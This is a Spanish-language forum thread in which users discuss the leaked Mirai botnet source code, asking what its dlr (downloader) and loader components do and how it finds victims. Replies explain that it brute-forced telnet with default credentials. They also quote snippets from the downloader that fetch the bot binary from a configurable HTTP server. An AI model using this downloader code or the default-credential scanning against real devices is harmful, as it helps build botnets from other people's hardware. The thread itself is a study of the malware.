Partes de la Botnet Mirai

[e]

Hola  , hace poco estuve investigando algo sobre Mirai, estuve mirando el código de aquí:

https://github.com/jgamblin/Mirai-Source-Code
y me prguntaba que eran los directorios dlr y loader, y en general como buscaba víctimas este malware.
Gracias y saludos.

[@XSStringManolo]

Sin mirarlo dlr debe venir de downloader, "descargador" y loader "subidor".
Será para descargar y subir módulos de la botnet para añadirle funcionalidades, para descargar o subir un exploit(un código malicioso para hackear el tarjet aprovechando una fallo de seguridad) o para descargar desde ese software el propio server de la botnet o cualquier archivo.

No sé si tiene alguna función para buscar targets, lo normal es usar dorks, bases de datos, o los propios servidores de los proveedores de cámaras.

Si hay alguna parte del código que no entiendas publícala y la comentamos.
Mirai probaba a conectarse usando telnet con los credenciales por defecto.

[e]

Gracias por la ayuda  ,
entonces, del dlr y el loader, ¿donde se ejecutaría cada uno, en el servidor o en el cliente/bot?

Creo que las víctimas las busca con fuerza bruta en las IPs, aquí puedes echarle un vistazo:
https://github.com/jgamblin/Mirai-Source-Code/blob/master/mirai/bot/scanner.c

[animanegra]

En lo que respecta al dlr en su main tienes esto:

Código [Seleccionar] Expandir


#define HTTP_SERVER utils_inet_addr(127,0,0,1) // CHANGE TO YOUR HTTP SERVER IP


Esto se conecta al servidor http que tu pongas como pone en esa linea.
y hace peticiones GET a dicho server:

Código [Seleccionar] Expandir


if (write(sfd, "GET /bins/mirai." BOT_ARCH " HTTP/1.0\r\n\r\n", 16 + arch_strlen + 13) != (16 + arch_strlen + 13))


Y se baja el contenido guardandolo en un archivo.

[e]

Es decir, que lo que estaría pasando, es que lo que se ejecuta en el ordenador de la víctima es el downloader que descarga lo principal del C&C, y el loader,
sería el programa que se ejecuta en el servidor y que responde al downloader, ¿no  ?